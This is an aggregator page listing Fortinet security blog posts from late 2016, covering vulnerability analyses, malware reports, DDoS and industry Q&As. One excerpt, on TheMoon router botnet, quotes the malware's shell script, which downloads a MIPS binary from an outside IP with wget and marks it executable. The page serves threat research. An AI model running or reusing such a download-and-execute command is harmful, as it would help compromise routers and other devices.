What's new arround internet

Last one

Src Date (GMT) Titre Description Tags Stories Notes
Fortinet.webp 2016-11-28 08:51:26 Q&A: Defining a Holistic Strategy for Customers (lien direct) Fortinet's John Maddison offers some perspective following our Security Fabric and Fabric Ready announcements earlier this year. Can you talk about why “open” is such a critical element of our GTM selling strategy? An “open” strategy demonstrates the maturity of a vendor in their evolution towards developing a complete ecosystem of partnerships. This...
Fortinet.webp 2016-11-25 09:29:58 Ready for Cyber Monday? Maybe Not? (lien direct) Your 2017 Safe Holiday Shopping Guide: We will soon be in the throes of the holiday gift-buying season. A whole set of must-have connected devices have hit the stores, from smart accessories and appliances, to game consoles and online games, to web-enabled toys. And we will be buying many of them online, especially on cyber Monday. Are you ready? You are scouting online shopping websites, loading apps that automatically scan sites and compare prices to make sure you are getting the best deal, building your shopping lists, and checking your...
Fortinet.webp 2016-11-24 08:52:44 Managing the Attack Surface of a Smart City (lien direct) Smart cities are being planned the world over. Technology development always goes through two phases for any new discipline: first – tools are developed, and infrastructure is built and enabled. And second – the technology is scaled up. In the case of smart cities, we are in the first phase, where many of the kinks and challenges are still being ironed out. Here are some examples of services a smart city might provide: Coordinated energy control of air conditioners at homes during hot summer days to manage and preserve city...
Fortinet.webp 2016-11-23 11:42:32 Analysis of OpenSSL ChaCha20-Poly1305 Heap Buffer Overflow (CVE-2016-7054) (lien direct) A High-Severity Heap Buffer Overflow vulnerability was recently fixed in a patch  by Openssl Project.  This vulnerability affects the remote SSL servers that support the ChaCha20-Poly1305 cipher suite, and can be exploited to crash the SSL service. This High-Severity Heap Buffer Overflow vulnerability (CVE-2016-7054) is caused by an error when the ChaCha20-Poly1305 cipher suite is decrypting large amounts of application data. We will examine the root cause of this vulnerability in this post. The ChaCha20-Poly1305 cipher suite is...
Fortinet.webp 2016-11-23 07:22:51 Ready for the Holidays? Maybe Not? (lien direct) Your 2017 Safe Holiday Shopping Guide: Starting the Friday after Thanksgiving, millions of Americans will be braving the crowds and heading out to malls, big-box stores, and local merchants looking to take advantage of seasonal discounts. Are you ready? You are building your shopping lists, checking your credit card balances, scanning for can't miss deals, and planning your shopping itineraries. You may have even installed new apps that can automatically scan and compare prices to make sure you are getting the best deal. But what about...
Fortinet.webp 2016-11-22 08:04:08 FortiCast: The New Podcast about Fortinet Technology (lien direct) FortiCast, the new podcast about Fortinet technology, available now on iTunes, SoundCloud, and YouTube, as well as the podcast app of your choice.
Fortinet.webp 2016-11-22 08:03:24 With More Than 340 Patents and Counting, Fortinet\'s Visionary Innovation is Driving the Evolution of Security (lien direct) Our patent reward program open to all employees is a huge part of why Fortinet has reached another innovation milestone - more than 343 patents issued worldwide, with more pending.
Fortinet.webp 2016-11-21 10:53:59 Fortinet 2017 Cybersecurity Predictions: Accountability Takes the Stage (lien direct) With the growth and pervasiveness of online devices and digital tools, we reached a critical tipping point in 2016. The need for accountability at multiple levels is urgent and real and affects us all. If something isn't done, there is a real risk of disrupting the emerging Digital Economy.   Even in recent weeks, IoT devices were hijacked to shut down a huge section of the Internet. Stolen documents were used in an attempt to influence the US presidential election. Ransomware began to reach epidemic proportions, including high...
Fortinet.webp 2016-11-18 17:44:17 Android Malware Masquerades as Banking App, Part II (lien direct) New variants of android banking malware target even more German banks, popular social media apps, and more Summary In my previous blog I provided a detailed analysis of a new android banking malware that spoofed the mobile applications of several large German banks to trick users into revealing their banking credentials. This week I found several new variants of this growing malware, and in this update I am sharing these new findings. Install the malware One of these variants masquerades as another German mobile banking app. Once installed,...
Fortinet.webp 2016-11-18 16:29:40 DefCamp 2016 (lien direct) This was my first time at DefCamp in Romania, and it was definitely a good experience. DefCamp was an interesting mixture of not so technical talks (but with acute insights) and technical ones. Among the "not so technical" ones, I liked the following: Do Tinder bots dream of electric toys? Tinder is a match-making/dating application. Inbar Raz decided to test it. He created a profile according to online guidelines (images with animals, images looking official, etc.) and quickly got many matches. But...it turned out that they...
Fortinet.webp 2016-11-18 09:39:41 Android Banking Malware Masquerading as Email App Targets German Banks (lien direct) Summary We recently found an Android banking malware masquerading as an email app that targets several large German banks. This banking malware is designed to steal login credentials from 15 different mobile banking apps for German banks. It also has the ability to resist anti-virus mobile apps, as well as hinder 30 different anti-virus programs and prevent them from launching. Install the malware The malware masquerades as an email app. Once installed, its icon appears in the launcher, as shown below. Figure 1. Malware App Icon   Figure...
Fortinet.webp 2016-11-17 12:36:14 Where I (Nearly) Won a Connected Coffee Machine at DefCamp 2016 (lien direct) Besides conference sessions, DefCamp 2016 also ran various competitions in the hacking village. I wandered about the critical infrastructure area - an amazing model kit of a train, station, and solar panels all controlled by Siemens and Schneider PLCs - but mostly, of course, at the _IoT village_. Critical Infrastructure village with model kit, PLCs, and SCADA supervision monitor   At the IoT village, several connected devices were available to be hacked: web cameras, a water sensor, a coffee maker...I lost some time on the Foscam...
Fortinet.webp 2016-11-15 12:07:42 Q&A: Securing the Move to the Cloud (lien direct) In the past decade, cloud computing has become increasingly popular among enterprises, with Gartner Research projecting IT spending on public cloud-based infrastructure services to surpass $24 billion in 2016, and associated management and security to surpass $8 billion. This evolution of our IT infrastructure brings with it concerns about the safety of our data, applications and end users. We talked to Chad Whalen about the move to the cloud, the related security concerns, and how Fortinet is protecting this rapidly-evolving IT infrastructure. How...
Fortinet.webp 2016-11-15 10:49:24 Wrap-up: US Campaign-themed Malware and Trolls (lien direct) The US political season is over and a new President has been elected. This election has arguably been one of the most colorful (some might say entertaining) and controversial presidential election cycles in the country’s history. For cyber crooks, this has been just the right environment to target victims with their attacks and trolls. In this post we take a look at some of the more notable US campaign-themed malware and scams. While some may induce false fears and a few laughs, others represent serious threats.  “Donald...
Fortinet.webp 2016-11-14 15:27:25 PC Locker - A New Survey Locker in the Wild (lien direct) A lot of people, located around the world, have been infected with ransomware - a type of malware that encrypts computer files and demands payment to have them unlocked. Some professionally written ransomware has been so financially successful for their authors, such as Locky and Cerber, that many others have begun to emerge to take a piece of the pie. The researchers of the ART team at Fortinet have recently discovered a new malware. While it still locks the user's computer and demands they follow instructions to have it unlocked, this time...
Fortinet.webp 2016-11-14 12:18:56 Black Nurse DDoS Attack: Power of Granular Packet Inspection of FortiDDoS with Unpredictable DDoS Attacks (lien direct) A well-known aspect of criminals in any space is that they are unpredictable. They look for holes and vulnerabilities in systems and try to use them to their advantage. Security systems, therefore, have to be architected in a way that assumes attack unpredictability. A new threat emerging on the horizon is called BlackNurse DDoS attack. Fortinet protects organizations against this content based protection, with the IPS signature  "BlackNurse.ICMP.Type.3.Code.3.Flood.DoS", as well as with behavior-based protection through our FortiDDoS...
Fortinet.webp 2016-11-14 10:11:13 Cybersecurity In this New Political Era (lien direct) The next President of the United States will begin their term in the midst of dramatic transitions happening across the world. This isn't about the deficit or foreign policy or climate change. Advisors well versed in strategies related to those issues surround the President. What needs to be addressed is the global transition to a digital economy. This change is affecting every aspect of our society, from how businesses generate profit to how individuals live their lives and interact socially. The digital economy and society combine technolo
Fortinet.webp 2016-11-11 09:02:37 Q&A With FortiVeteran Program Graduate Chris Armstrong (lien direct) Veteran's Day is a great opportunity to feature a “graduate” of our Fortinet Veterans Program, which attempts to help fill the cybersecurity talent gap by helping veterans transition from the armed forces back into a civilian job in the realm of cyber security.  Today we spotlight Chris Armstrong, a former Marine Officer who was stationed at Camp Pendleton in California. You can also read about other graduates from the program on our blog. Can you give us a summary of your background in the military? I was a Communications...
Fortinet.webp 2016-11-10 17:37:53 Unmasking the Bonasira Cyperine Author (lien direct) Following our research on Cyperine 2.0 and Next Man History Stealer, the malware author rebranded their info stealer as Medusa. While it basically has the same featurse as Cyperine, you now need a valid account to access the builder. The example below compares Cyperine on the left and Medusa on the right, which shows a user logged in as Deadzeye. Figure 01. Builder comparison between Cyperine (Left) and Medusa (Right) The builder signatures clearly show that both of these variants were made by the same author, who goes by the name...
Fortinet.webp 2016-11-09 09:28:23 Fabric-Ready: Q&A with Ziften\'s Josh Applebaum (lien direct) Fortinet recently sat down with Fabric-Ready Partner Ziften to learn what's top of mind for its customers, the key IT challenges they are facing, and how Ziften's approach to integrated security is helping drive business and customer success. Tell us a bit about Ziften's business and the types of customers that you serve. Ziften provides client-to-cloud visibility and security, offering unprecedented access to user behavior, system, application, and network data originating from client devices, data centers, and the cloud....
Fortinet.webp 2016-11-08 10:49:54 Analysis of ISC BIND DNAME Answer Handling DoS (CVE-2016-8864) (lien direct) A defect in BIND's handling of a DNAME answer was fixed in a critical update from the Internet Systems Consortium (ISC) several days ago. This defect affects all BIND recursive servers, and can be exploited to remotely take down recursive servers by sending a simple DNAME answer thereby causing a denial of service (DoS.) This potential DoS vulnerability is caused by an assertion failure in Resolver.c or Db.c when caching the DNS response with DNAME Record. In this post we will examine the underlying code and expose the root cause of this...
Fortinet.webp 2016-11-08 10:13:07 Why Healthcare Security Breaches Are Big Wins for Cybercriminals (lien direct) Healthcare security breaches can be extremely rewarding for cybercriminals. Read this post to find out why.
Fortinet.webp 2016-11-07 09:12:27 Shopping at the Online Blackmarketplace (lien direct) Malware and hacking services are becoming commoditized. Ransomware as a service has become popular this year. More effective security tools have cybercriminals looking for new tools and techniques to more effectively target victims and bypass security. And malware developers are continually looking for new markets where they can connect and sell their services. In the past, we have discussed the rise of the DarkNet as a cybercrime marketplace. But the reality is that many attackers simply use sites such as eBay, Craigslist, and other well-known...
Fortinet.webp 2016-11-03 08:56:56 Don\'t Call Me an Expert, Call Me a Hacker (lien direct) This is the third blog in a series titled WhiteHat, chronicling the most pressing questions about what it really means to be a hacker, the moral dilemma that white hat hackers face, and what a profession in cybersecurity is really all about. Read more stories from the hackers at Fortinet here.   I recently sat down with Kushal Shah, a security researcher in Fortinet's FortiGuard Labs research division. Kushal sheds light on his interest in cybersecurity and how he became a white hat hacker by trade. Q: Hi Kushal,...
Fortinet.webp 2016-11-02 21:03:05 The Angry Spam and The Tricky Macro Delivers Updated Hancitor (lien direct) Hancitor is one of the better-known malware downloaders due to its numerous SPAM runs and evolving delivery technique. It reminds us of Upatre, which gained notoriety status over the past two years but has now died down, possibly due to the takedowns of its major payloads. In the case of Hancitor, it still seen as a favourite carrier of very much active malware families such as Pony and Vawtrak. Just recently, we found a new spam campaign of Hancitor with some notable developments that may have been in the previous variants, but were not discussed...
Fortinet.webp 2016-11-01 08:46:14 Recent Security Trends We\'ve Seen in Financial Services (lien direct) The financial services industry is always looking at the latest trends to better protect their data. Read this post to learn what's happening today.
Fortinet.webp 2016-11-01 08:41:43 Android banking malware masquerades as Flash Player, targeting large banks and popular social media apps (lien direct) Active users of mobile banking apps should be aware of a new Android banking malware campaign targeting customers of large banks in the United States, Germany, France, Australia, Turkey, Poland, and Austria. This banking malware can steal login credentials from 94 different mobile banking apps. Due to its ability to intercept SMS communications, the malware is also able to bypass SMS-based two-factor authentication. Additionally, it also contains modules to target some popular social media apps. Install the malware The malware masquerades...
Fortinet.webp 2016-10-31 14:32:33 The First Major Update of Cerber 4 Ransomware Has Surfaced (lien direct) Cerber 4.1.0 is already here!  In this blog we will share information about this updated version uncovered by Fortinet, including its differences and similarities compared to previous versions.  Cerber is a classic ransomware tool that encrypts victims' files and then demands payments to decrypt them. Victims are given a period of time for making the payments and then (hopefully) having their original unencrypted files restored. Cerber marks encrypted files with a specific extension. In previous versions (Cerber 2 and 3), encrypted...
Fortinet.webp 2016-10-31 10:30:15 IoT-based Linux/Mirai: Frequently Asked Questions (lien direct) Ever since the Mirai DDoS attack was launched a few weeks ago, we have received a number of questions that I will try to answer here. If you have more follow-up questions, please let me know! Who is the Author of Mirai? The presumed developer goes under the pseudonym of 'Anna Senpai' on Hackforums - an English-speaking hacker forum. His/her account on the forum is recent (July 2016). and was probably created when he/she started working on Mirai. For example: July 10 - Begins "killing QBots" August...
Fortinet.webp 2016-10-31 09:17:19 The Challenge of E-Voting (lien direct) Countries where open elections occur have often developed arcane rules and processes for casting, collecting, and tabulating votes, in part because counting and managing votes is so time-consuming. But also because different groups, especially those with power, have strongly vested interests not only in the outcome, but also in the process itself. In the US, for example, Americans voting in the current Presidential election don't actually vote for Presidential candidates, but for slates of “electors” pledged to support those...
Fortinet.webp 2016-10-31 08:27:26 Microsoft Kernel Integer Overflow Vulnerability (lien direct) Last month I discovered and reported an integer overflow vulnerability in the Windows Registry. Last Tuesday, October 25th, Microsoft released Security Bulletin MS16-124, which contains the patch for this vulnerability, and identifies it as CVE-2016-0070. This vulnerability could lead to local privilege elevation, and is rated as “Important” by Microsoft. The vulnerability affects multiple Windows versions, and Microsoft has recommended installing this update immediately. In this blog I will share the details of this vulnerability. How... Guideline
Fortinet.webp 2016-10-28 08:30:20 On Email\'s Birthday, Here\'s a Look at How to Keep it Safe (lien direct) On the anniversary of the first email transmission, we look at how email has evolved over the years, and how to keep it as an essential tool going forward, despite the growing and increasingly sophisticated dangers of e-mail-based malware and other email-borne threats. What some consider to be the first email – the first electronic message sent between two computers – was transmitted on this day exactly 47 years ago, on October 29, 1969. The exchange, from a computer at UCLA to one at Stanford Research Institute, took place over the...
Fortinet.webp 2016-10-27 13:53:06 Joomla – From No One to the Highest Privilege (lien direct) Joomla, a popular free and open-source content management system, just released version 3.6.4 that fixed two critical vulnerabilities: [CVE-2016-8870] - Core - Account Creation: attackers can exploit this vulnerability to create any account in a Joomla system regardless of whether its registration has been disabled. [CVE-2016-8869] - Core - Elevated Privileges:  with the vulnerability above, an attacker not only can register an account in a vulnerable system, but also register with the highest privilege – Administrator. CVE-2016-8870...
Fortinet.webp 2016-10-27 13:24:46 Microsoft and Fortinet Extend Partnership to Secure Mission-Critical Workloads in Azure Government Cloud (lien direct) Fortinet and Microsoft today announced an extension of their partnership to protect the cloud environments of their joint government customers. The US Federal Government sets the world’s highest security standards for data protection. Other public institutions, like state and local governments, police, and fire departments, follow these standards as well to protect the citizenry they serve. Partnering to Deliver Cloud Security for Government Organizations Fortinet and Microsoft are committed to delivering world-class security to...
Fortinet.webp 2016-10-27 10:38:41 Driverless Cars: A New Way of Life Brings a New Cybersecurity Challenge (lien direct) Cars are an essential part of our everyday life, and are crucial for transporting millions of commuters through towns and cities, and even from one country to another, on a daily basis. With “smart” vehicles increasingly playing a major role in our day-to-day lives, it's no surprise that semi- and fully autonomous transportation, and the potential for driverless cars have become hot topics. According to Gartner, driverless vehicles will represent approximately 25 percent of the passenger vehicle population in use in mature markets...
Fortinet.webp 2016-10-26 08:57:00 The Glider (lien direct) This is the second blog in a series titled WhiteHat, chronicling the most pressing questions about what it really means to be a hacker, the moral dilemma that white hat hackers face, and what a profession in cybersecurity is really all about. Read more stories from the hackers at Fortinet here. When you run a search for the term “Hackers” you will most certainly come across (1) the 1995 film Hackers, (2) a lengthy Wikipedia article or disambiguation page, and (3) the timeless book Hackers: Heroes of the Computer Revolution (recommended). Among...
Fortinet.webp 2016-10-25 15:55:43 Scaling the Cloud: OpenStack and Security (lien direct) OpenStack is the open-source cloud management platform software that can be used to build a low-cost private cloud for development, and cloud infrastructure as a service (IaaS) offering. Enterprises are also turning to OpenStack for data center and cloud deployment alternatives. Fortinet’s Cynthia Hsieh offers some perspective about OpenStack and security today. Can you talk high level about what customers are considering in regards to the cloud today? Beyond virtualization, organizations are beginning to plan and implement next-generation,...
Fortinet.webp 2016-10-25 11:27:18 Hack.lu 2016 Wrap-Up (lien direct) This year again I attended Hack.Lu 2016. Let it be free workshops, CTF, lightning or regular talks, there are many ways to learn new stuff. Not to mention the kind and informal atmosphere of the conference. Let me give you an example which perfectly illustrates the atmosphere: during lunch time, I started talking Bluetooth Low Energy with a fellow researcher (@virtualabs). And... we ended up tearing down his connected toothbrush! Figure 1. Toothbrush teardown I told him about my findings (demoed at VB 2016) remote controlling the toothbrush...
Fortinet.webp 2016-10-24 10:54:41 "Locky Happens: Notorious Ransomware Leaves an Unpleasant Trace" (lien direct) We attended the recent VB 2016 conference to present our findings on the development and evolution of Locky ransomware. In that same presentation we also discussed an automation system designed by Fortiguard to extract its configuration and hunt for new variants. Locky-ly (*wink*), while improving the system we couldn’t help but notice another new variant. Actually, aside from the encrypted file name extension change, there are no major developments from the “.odin” variant in this new variant. However, it appears that criminals...
Fortinet.webp 2016-10-24 10:46:24 Mirai Botnet ­ Protect Your Infrastructure with FortiDDoS (lien direct) As further details become available for the massive distributed denial of service attack against Dyn on Oct 21 2016, here are some things FortiDDoS customers can do to protect themselves from a potential Internet of Things (IoT) botnet-based DDoS attack like Mirai. Mirai spreads by compromising vulnerable IoT devices such as DVRs. Many IoT manufacturers failed to secure these devices properly, and they don't include the memory and processing necessary to be updated. They are also usually not in control of the destination of their outbound...
Fortinet.webp 2016-10-24 10:36:43 IoT malware are coming. Will you listen to me now? (lien direct) It happened again. This past weekend we witnessed another record-setting DDoS attack, probably primarily caused by infected IoT devices. This attack is attributed to the same piece of code - Linux/Mirai - which attackedKrebsOnSecurity.com and OVH in September. List of Attacks Attributed to Linux/Mirai Date Where Rate Comments Oct 21, 2016 Dyn DNS ? Some of the attacks were coming from hosts infected...
Fortinet.webp 2016-10-24 10:25:12 Information-stealing Malware Is Spread Via Word Document (lien direct) Recently we received a SPAM with an attachment, which is a password-protected Word document. Its MD5 is 6619356e9e0c9d2445bf777a8bea5d6a, which is detected as “WM/Agent.60F9!tr” by the Fortinet AntiVirus service. When the document is opened, the attached malicious VB script code is executed and additional malware is created and executed. Based on our analysis, this is information-stealing malware. In this blog, we’ll show you how the malware works, what information is stolen from a victim’s system, and how the stolen data...
Fortinet.webp 2016-10-21 15:33:02 When Half the Internet Goes Down Due to a Cyber-Assault on DNS Infrastructure (lien direct) On Oct 21, 2016, yet another cyber assault happened on a large DNS provider's infrastructure, bringing down websites and services on the east coast of the United States. While it is easy to launch these attacks, the solutions available in the market have not kept pace. FortiDDoS is the only hardware logic solution in the market today that easily distinguishes between attack traffic and legitimate traffic at high rates and keep services up during such attacks. The DDoS attack on the DNS infrustructure of Dyn, a major DNS provider,...
Fortinet.webp 2016-10-21 11:36:21 Fortinet Researchers Discover Two Critical Vulnerabilities in Adobe Acrobat and Reader  (lien direct) Fortinet researchers recently discovered two critical zero-day vulnerabilities in Adobe Acrobat and Reader. They are identified as CVE-2016-6939 and CVE-2016-6948. Adobe released a patch to fix these vulnerabilities on October 6, 2016. CVE-2016-6939 This vulnerability was discovered by Kai Lu. CVE-2016-6939 is a heap overflow vulnerability. The vulnerability is caused by a crafted PDF file which causes an out of bounds memory access due to an improper bounds check when manipulating an array pointer. The specific vulnerability exists...
Fortinet.webp 2016-10-21 11:09:56 4 Motives Behind Why the Healthcare Security Market is Surging (lien direct) The healthcare security market is flourishing due to a number of recent trends. Read this post to find out more.
Fortinet.webp 2016-10-20 08:52:50 TheMoon - A P2P botnet targeting Home Routers (lien direct) In the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year.  In this post we will dissect a bot installed on the affected ASUS routers. The following figure shows attack traffic captured through Wireshark. Figure 1 Exploitation of CVE-2014-9583 Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod...
Fortinet.webp 2016-10-19 11:33:40 "JapanLocker": An Excavation to its Indonesian Roots (lien direct) Fortinet has discovered a new open-source PHP ransom malware that has been targeting web sites using a simple encryption algorithm that is effective enough to really frighten web server owners. What is more interesting, however, is the information we have uncovered regarding the possible roots of the attacks/attackers. Basing only on the email address that it uses for ransom negotiations, “japanlocker@hotmail.com”, victims and researchers alike may make an obvious guess where the attacks may have come from. However, our investigation...
Fortinet.webp 2016-10-19 08:40:02 The Killer App For Cloud: Accelerating the Deployment of NFV Solutions (lien direct) “The cloud,” a word that used to cause network folks to roll their eyes, is now a reality. Public cloud architectures are quickly becoming the backbone, no pun intended, of the corporate IT infrastructure. There are some compelling reasons for this. The first that comes to most people's minds is price, but that's not really true. The greatest misnomer of “the cloud” is that it is cheap, although it may be inexpensive to try out, or to put minor business assets in the cloud. For small businesses, it is a panacea....
Fortinet.webp 2016-10-18 13:23:32 Fortinet Fabric Ready Program- More Open than Ever (lien direct) On September 26th, Fortinet announced our new Fortinet Fabric Ready Program, which delivers on the “Open” attribute of the Fortinet Security Fabric by providing threat intelligence visibility across multi-vendor cybersecurity solutions. Cross-product  coordination (regardless of vendor) is a critical capability for today's enterprises, as it is rare for an organization to completely source all IT security components from a single vendor across the entirety of their network and covering all attack vectors.  Leaving...
Fortinet.webp 2016-10-18 10:10:34 Virus Bulletin 2016 Denver Wraps Up (lien direct) VB 2016 Conference was held this year at the Hyatt Regency Hotel in Denver, CO, USA. This conference is an annual event where IT security researchers from around world gather to share their knowledge, learn, and discuss trends in the global threat landscape. This year we had the privilege to attend as well as meet, hang out with, and share ideas with some of the field’s top researchers. The conference scheduled a great lineup of speakers and presentations, so it was tough to pick which topic to attend. We are going to share some here some...
Last update at: 2024-06-28 10:07:34
See our sources.
My email:

To see everything: Our RSS (filtrered) Twitter